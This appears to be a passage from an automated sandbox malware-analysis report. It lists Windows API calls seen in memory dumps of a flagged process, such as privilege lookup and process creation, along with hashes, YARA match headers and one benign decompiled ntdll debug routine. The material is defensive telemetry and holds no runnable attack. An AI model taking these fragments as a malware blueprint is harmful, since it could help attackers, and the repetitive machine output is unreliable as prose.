                                                                                        • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02C6834A
                                                                                        • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02C6836B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.591652804.0000000002C60000.00000040.00000001.sdmp, Offset: 02C60000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: MessagePostThread
                                                                                        • String ID:
                                                                                        • API String ID: 1836367815-0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02C6834A
                                                                                        • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02C6836B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.591652804.0000000002C60000.00000040.00000001.sdmp, Offset: 02C60000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: MessagePostThread
                                                                                        • String ID:
                                                                                        • API String ID: 1836367815-0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02C7A134
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.591652804.0000000002C60000.00000040.00000001.sdmp, Offset: 02C60000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateInternalProcess
                                                                                        • String ID:
                                                                                        • API String ID: 2186235152-0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • RtlAllocateHeap.NTDLL(02C74506,?,02C74C7F,02C74C7F,?,02C74506,?,?,?,?,?,00000000,00000000,?), ref: 02C7A05D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.591652804.0000000002C60000.00000040.00000001.sdmp, Offset: 02C60000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AllocateHeap
                                                                                        • String ID:
                                                                                        • API String ID: 1279760036-0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • RtlAllocateHeap.NTDLL(02C74506,?,02C74C7F,02C74C7F,?,02C74506,?,?,?,?,?,00000000,00000000,?), ref: 02C7A05D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.591652804.0000000002C60000.00000040.00000001.sdmp, Offset: 02C60000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AllocateHeap
                                                                                        • String ID:
                                                                                        • API String ID: 1279760036-0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,02C6F1A2,02C6F1A2,?,00000000,?,?), ref: 02C7A200
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.591652804.0000000002C60000.00000040.00000001.sdmp, Offset: 02C60000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: LookupPrivilegeValue
                                                                                        • String ID:
                                                                                        • API String ID: 3899507212-0
                                                                                        • Opcode ID: f62f904046c5bea5672e73507ab16f5cd7823b0ea009612af3d5a73ed91c0bce
                                                                                        • Instruction ID: 16eb3ec7ad94b6d54f499d6a02b32ce69f22b96a849f57de792749bc0fc9712e
                                                                                        • Opcode Fuzzy Hash: f62f904046c5bea5672e73507ab16f5cd7823b0ea009612af3d5a73ed91c0bce
                                                                                        • Instruction Fuzzy Hash: 29E0DFB92042542BCB10DF54DC80EE73BA8DF49260F158999FCC927202C434A815CBB0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,02C6F1A2,02C6F1A2,?,00000000,?,?), ref: 02C7A200
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.591652804.0000000002C60000.00000040.00000001.sdmp, Offset: 02C60000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: LookupPrivilegeValue
                                                                                        • String ID:
                                                                                        • API String ID: 3899507212-0
                                                                                        • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                        • Instruction ID: ad0294385d3add50e6add74ff04ba91d92551ecf994daaeb60cdad07c14128c3
                                                                                        • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                        • Instruction Fuzzy Hash: 05E01AB12002086BDB10DF49CC84EEB37ADEF88650F018154BA0867241C930E8108BF5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • SetErrorMode.KERNELBASE(00008003,?,02C68CF4,?), ref: 02C6F6CB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.591652804.0000000002C60000.00000040.00000001.sdmp, Offset: 02C60000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ErrorMode
                                                                                        • String ID:
                                                                                        • API String ID: 2340568224-0
                                                                                        • Opcode ID: a88ce3a1f4406ce389916a2cc75593bb37e1b4bb150636bba99f455bd7a5a65a
                                                                                        • Instruction ID: 5c29728e16b8a74b54901abfeb6492700f8a14b473b816e006c1a6605826d866
                                                                                        • Opcode Fuzzy Hash: a88ce3a1f4406ce389916a2cc75593bb37e1b4bb150636bba99f455bd7a5a65a
                                                                                        • Instruction Fuzzy Hash: 71E0C271BA03017BE714BEB49C0AF2673D66B44A51F444078F949DB2D7EA20D1008590
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • SetErrorMode.KERNELBASE(00008003,?,02C68CF4,?), ref: 02C6F6CB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.591652804.0000000002C60000.00000040.00000001.sdmp, Offset: 02C60000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ErrorMode
                                                                                        • String ID:
                                                                                        • API String ID: 2340568224-0
                                                                                        • Opcode ID: cec8ba978ca00a4152f16fa99d3564a32c161d26ed3cfe0d05bc2e8c73902fa4
                                                                                        • Instruction ID: 35c11f3c74ab5ac6f1627508b396885ed6d068d076ab709115ca5a5ef69afbd1
                                                                                        • Opcode Fuzzy Hash: cec8ba978ca00a4152f16fa99d3564a32c161d26ed3cfe0d05bc2e8c73902fa4
                                                                                        • Instruction Fuzzy Hash: 51D0A7717903043BE610FAA49C07F2772CE5B44B14F494064FA49D73C3D950E1004565
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.591953387.0000000004670000.00000040.00000001.sdmp, Offset: 04670000, based on PE: true
                                                                                        • Associated: 00000007.00000002.592492745.000000000478B000.00000040.00000001.sdmp
                                                                                        • Associated: 00000007.00000002.592508394.000000000478F000.00000040.00000001.sdmp
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: def99e55e260eb71c4c5175e3058f01a96591ad071906ae4072f7def8746e585
                                                                                        • Instruction ID: b413862c95e9057216e35b34e6aca71a0a0cfec62c1c9a92cbfaa24559421e7c
                                                                                        • Opcode Fuzzy Hash: def99e55e260eb71c4c5175e3058f01a96591ad071906ae4072f7def8746e585
                                                                                        • Instruction Fuzzy Hash: 9CB02BF1E020C1C5F700DB710A08737390077D0740F12C011D1020240A0338D080F2B1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Non-executed Functions

                                                                                        C-Code - Quality: 53%
                                                                                        			E0472FDDA(intOrPtr* __edx, intOrPtr _a4) {
                                                                                        				void* _t7;
                                                                                        				intOrPtr _t9;
                                                                                        				intOrPtr _t10;
                                                                                        				intOrPtr* _t12;
                                                                                        				intOrPtr* _t13;
                                                                                        				intOrPtr _t14;
                                                                                        				intOrPtr* _t15;
                                                                                        
                                                                                        				_t13 = __edx;
                                                                                        				_push(_a4);
                                                                                        				_t14 =  *[fs:0x18];
                                                                                        				_t15 = _t12;
                                                                                        				_t7 = E046DCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                                                                        				_push(_t13);
                                                                                        				E04725720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                                                                        				_t9 =  *_t15;
                                                                                        				if(_t9 == 0xffffffff) {
                                                                                        					_t10 = 0;
                                                                                        				} else {
                                                                                        					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                                                                        				}
                                                                                        				_push(_t10);
                                                                                        				_push(_t15);
                                                                                        				_push( *((intOrPtr*)(_t15 + 0xc)));
                                                                                        				_push( *((intOrPtr*)(_t14 + 0x24)));
                                                                                        				return E04725720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                                                                        			}


                                                                                        APIs
                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0472FDFA
                                                                                        Strings
                                                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0472FE2B
                                                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0472FE01
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.591953387.0000000004670000.00000040.00000001.sdmp, Offset: 04670000, based on PE: true
                                                                                        • Associated: 00000007.00000002.592492745.000000000478B000.00000040.00000001.sdmp
                                                                                        • Associated: 00000007.00000002.592508394.000000000478F000.00000040.00000001.sdmp
                                                                                        Similarity
                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                                        • API String ID: 885266447-3903918235
                                                                                        • Opcode ID: 5cefdf139285447d5c7d8aeec973f3882020aa5ae8d09a75fa7f00a8e50c4f53
                                                                                        • Instruction ID: a90f40b16c402df19e4bc1df6addfcb3ac96cccdca118549ffa1dd2f6ebbd42f
                                                                                        • Opcode Fuzzy Hash: 5cefdf139285447d5c7d8aeec973f3882020aa5ae8d09a75fa7f00a8e50c4f53
                                                                                        • Instruction Fuzzy Hash: ADF0F672640611BFE6212A55DD06F33BB6AEB44B30F140358F628562D1EA62FC2096F4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%